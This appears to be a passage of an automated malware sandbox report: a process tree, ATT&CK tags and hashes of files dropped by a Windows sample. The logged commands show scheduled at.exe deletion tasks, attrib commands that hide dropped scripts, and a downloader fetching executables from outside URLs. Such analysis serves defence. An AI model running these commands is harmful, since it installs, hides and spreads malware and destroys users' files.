                                                                • System Location Discovery: System Language Discovery
                                                                PID:4552
                                                              • C:\Windows\SysWOW64\at.exe
                                                                at 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"
                                                                4⤵
                                                                  PID:3936
                                                                • C:\Windows\SysWOW64\at.exe
                                                                  at 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
                                                                  4⤵
                                                                    PID:4428
                                                                  • C:\Windows\SysWOW64\at.exe
                                                                    at 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
                                                                    4⤵
                                                                      PID:1092
                                                                    • C:\Windows\SysWOW64\at.exe
                                                                      at 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"
                                                                      4⤵
                                                                        PID:1760
                                                                      • C:\Windows\SysWOW64\at.exe
                                                                        at 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»*.*"
                                                                        4⤵
                                                                          PID:4576
                                                                        • C:\Windows\SysWOW64\at.exe
                                                                          at 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»*.*"
                                                                          4⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2304
                                                                        • C:\Windows\SysWOW64\at.exe
                                                                          at 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd
                                                                          4⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:3940
                                                                        • C:\Windows\SysWOW64\at.exe
                                                                          at 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»*.*"
                                                                          4⤵
                                                                            PID:4800
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C .\copy.cmd
                                                                          3⤵
                                                                          • Drops file in Program Files directory
                                                                          • Drops file in Windows directory
                                                                          PID:1012
                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                            attrib +r +h +s "C:\Program Files\WinWare\361.cmd"
                                                                            4⤵
                                                                            • Sets file to hidden
                                                                            • Drops file in Program Files directory
                                                                            • Views/modifies file attributes
                                                                            PID:1380
                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                            attrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"
                                                                            4⤵
                                                                            • Sets file to hidden
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Views/modifies file attributes
                                                                            PID:4792
                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                            attrib +r +h +s "C:\Program Files\WinWare\tool.cmd"
                                                                            4⤵
                                                                            • Sets file to hidden
                                                                            • Drops file in Program Files directory
                                                                            • Views/modifies file attributes
                                                                            PID:672
                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                            attrib +r +h +s "C:\Program Files\WinWare\360.cmd"
                                                                            4⤵
                                                                            • Sets file to hidden
                                                                            • Drops file in Program Files directory
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Views/modifies file attributes
                                                                            PID:3696
                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                            attrib +r +h +s "C:\Program Files\Windows\360SE.vbs"
                                                                            4⤵
                                                                            • Sets file to hidden
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Views/modifies file attributes
                                                                            PID:4948
                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                            attrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"
                                                                            4⤵
                                                                            • Sets file to hidden
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Views/modifies file attributes
                                                                            PID:1888
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C .\360.cmd
                                                                          3⤵
                                                                          • Drops file in Program Files directory
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4772
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
                                                                          3⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2564
                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe
                                                                            ".\msn.exe"
                                                                            4⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:396
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:1984
                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://down.kuwo.cn/mbox/kwmusic_msnassistant.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:3672
                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                      1⤵
                                                                        PID:4072
                                                                      • C:\Windows\System32\mousocoreworker.exe
                                                                        C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                        1⤵
                                                                          PID:1892

                                                                        Network

                                                                              MITRE ATT&CK Enterprise v15

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • C:\Program Files\Windows\360SE.vbs

                                                                                Filesize

                                                                                215B

                                                                                MD5

                                                                                89ec051ab621ccd6ab684bb0f17a25ce

                                                                                SHA1

                                                                                1ef2b94c285bfb602892a6e42b1f4b5ba645315f

                                                                                SHA256

                                                                                0dcd0d2e9c602f4603d9f914a8e4764a6cd6c9c4e986d110b93d846c524110b3

                                                                                SHA512

                                                                                2ce9c5a5497d68ca5357d6b7ef0239a0bdc8706428e99fe88b2dd3026fb7c734484d77cee088a625bdcadb7eb8e293d728a7525b28614859640806cabb24b001

                                                                              • C:\Program Files\Windows\36OSE.vbs

                                                                                Filesize

                                                                                193B

                                                                                MD5

                                                                                327cff8c30e74afc5af67a19d82774e5

                                                                                SHA1

                                                                                13e1be20402e16f7dbf0d86c00f626070f8c9d16

                                                                                SHA256

                                                                                bc3ca0ade216627a479f9e92eb08efb88b38384fb2cb75f14757600d9b27f6d9

                                                                                SHA512

                                                                                0e7295ea48de989929313ceb0ac06afa490a188c756a5d71835fb04283f968c82bfeec72ea68e6fb2d957e4ab9d5bb49e95ee8ca9d5ad3c04d1abfbe0e18c6da

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\0BHOTC3C\suggestions[1].en-US

                                                                                Filesize

                                                                                17KB

                                                                                MD5

                                                                                5a34cb996293fde2cb7a4ac89587393a

                                                                                SHA1

                                                                                3c96c993500690d1a77873cd62bc639b3a10653f

                                                                                SHA256

                                                                                c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

                                                                                SHA512

                                                                                e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\360.cmd

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                20c2b9872ca6f858414a9251ae37dede

                                                                                SHA1

                                                                                853438b13ee186dcc87d2196781e154289749a0f

                                                                                SHA256

                                                                                e22076817c4391fcb6c373a2b5c89c79f814e30534316b4627661151a54aa2bf

                                                                                SHA512

                                                                                716a0ec68f92ef32ce74718e18b56c16095c0a35d29c47e63bdd1d8e8c44967541908cdf9d4ded7906c622c80773f63495c36743ec006a9dc53eed0f429b0192

                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd

                                                                                Filesize

                                                                                575B

                                                                                MD5

                                                                                1e9b64c129e313ec49378f5b823b2ca6

                                                                                SHA1

                                                                                21ecde39469900b9bd551f4a9576c5a9564d4d60

                                                                                SHA256

                                                                                87334dcec453b142801040c3084219f840a531c94553f06ee817192c121207ee

                                                                                SHA512

                                                                                0178907df2fa444f463c4c9604bffa7007569daa61b1905dee1b850c9a50754b6bf90c70364ccfc65a609d2dee9f902eefc4b564afcc37fdb253cdfe0bfba840

                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                3f60b1c32c66c4fafe67b131c81b537e

                                                                                SHA1

                                                                                abacf3653d89eff785c76bc9de685210da67409d

                                                                                SHA256

                                                                                306fc7e0980c7e21adf92b220204dfa36baf0f5d107f7de0a167a92f35818a94

                                                                                SHA512

                                                                                20fcf8215876e448b4d1bfbe8a6ff167cfdb262183364138560b6d5740da0dbf7f0a723763bfc3743240b6fea6fa5f1fa4e25a14a5edb54271bbd7e97fff727a

                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Internet Exploror.lnk

                                                                                Filesize

                                                                                104B

                                                                                MD5

                                                                                b6090a24bad18a0205bb215cb1fd42e6

                                                                                SHA1

                                                                                da56e637a186333e1fa8401b9600e9efcadbe86b

                                                                                SHA256

                                                                                5cf73d8ba3a6656e804041884cefc0148c3ef80fd4b8633a6647a033082f15f8

                                                                                SHA512

                                                                                4ca8a5cd200eaf8d8a023c47e7a279e41279c045bf567b81f95e93ca25d5a51dec2786de98efa5b907ec5633c8400e497f6bcaf636d4591d7c42e21ec3039ad4

                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                20e8b5c5e8779c45d0cffeb223e1b4ee

                                                                                SHA1

                                                                                e33e7c02fc54766be39b7844f31baae5d474c27e

                                                                                SHA256

                                                                                5412e0c39e7967064c825e6d487f41d356e423f2b60a272213b0909dae1e22b0

                                                                                SHA512

                                                                                03c707911e6fe9bd190fe645b0743f7e65a8b0175aee8367a84203be9f213b2c4135a360aaeea63469e76d3dc31a9563a9dd2182f3b24c5489c7addd2d184673

                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd

                                                                                Filesize

                                                                                110B

                                                                                MD5

                                                                                83b98633c669411050739335068d2755

                                                                                SHA1

                                                                                de25c70f8b5845375efd44ae5e4386380fe27ead

                                                                                SHA256

                                                                                b057b6c505f2257015ca2efbb6ea86ffe0357ee7cae262191349a208ede27639

                                                                                SHA512

                                                                                920421a1287091d699bee5480c67f906626f5ff8b4ef6629123a99828e7c6a78ddecc814320b9529f105ed60126df481ec8086173adf1b883d674e6ba3a9364f

                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\runonce.cmd

                                                                                Filesize

                                                                                11KB

                                                                                MD5

                                                                                2499bcde9656b2401e95fe6c6d4fe268

                                                                                SHA1

                                                                                dc7bf897affd9f8e4f870be5fa102009a02f22ed

                                                                                SHA256

                                                                                3e0c8d48799b9fb4c275a8332a009d6d0bb0a6315343b45aad43c20cfbd4e2b6

                                                                                SHA512

                                                                                fa3eb6078510a2b70309d279157c60a5ad60c970c35906224ca5a3c9d626ef7b2d2d97fe75a06855a137da80a339ba499e0e4bc8f7fbf88882390710b25289b9

                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\tool.cmd

                                                                                Filesize

                                                                                3KB

                                                                                MD5

                                                                                4e8f8a4f4a836c587f77d3f294286692

                                                                                SHA1

                                                                                b6ae662e53f5d08f7cbc0c06a08d47930dbaf0cc

                                                                                SHA256

                                                                                b0367e47ed6fee2d6843d240ac7e83b932466ddd13cc57d971d6cb8e8b2c55a5

                                                                                SHA512

                                                                                25dfc1a3b4bd4b5c3263f64ae36127bc141138d922316b97bc96c5edd8b84a5b6193b7c687c89ad554d8abee68bc4aad52632a3d98e220352515e380cd749874

                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs

                                                                                Filesize

                                                                                970B

                                                                                MD5

                                                                                4c63083996b714d331f877a7bb204216

                                                                                SHA1

                                                                                de8807c42284e99ba308ea8ad01cc3f4a8894b0a

                                                                                SHA256

                                                                                34666e9c92a0260d690f262a23e89a9b4ffa0c5c25178d0f2c1720f4b8d8b569

                                                                                SHA512

                                                                                f83b239bf307a4864d5f0fcb5c5052b0330ced35af767c48171ca5ec74949aa53219bfe226b9813f0408d979fa0774df89687da1ad36c49ee2ed12e40c842c1d

                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe

                                                                                Filesize

                                                                                797KB

                                                                                MD5

                                                                                cab7920419ef7ed1e22e9fc4da013bd1

                                                                                SHA1

                                                                                48fc6488e928b4fa5ee75ca74ed1548e316bd6db

                                                                                SHA256

                                                                                e96c8d5cc0a23032da47280e8835161a959de6965b696328c8a0edf160c3f208

                                                                                SHA512

                                                                                8393a0160a8e58169554528562e40cf3d4318320475d53377b24dbba42a83026e390a2bb272cdcb89e4d851aac0e75f9cbda65440258569662711f9d1eadc4f0

                                                                              • memory/396-92-0x0000000000400000-0x0000000000420000-memory.dmp

                                                                                Filesize

                                                                                128KB

                                                                              • memory/1984-91-0x0000000000400000-0x00000000004D1000-memory.dmp

                                                                                Filesize

                                                                                836KB

                                                                              • memory/3672-93-0x0000000000400000-0x00000000004D1000-memory.dmp

                                                                                Filesize

                                                                                836KB

                                                                              • memory/3672-106-0x0000000000400000-0x00000000004D1000-memory.dmp

                                                                                Filesize

                                                                                836KB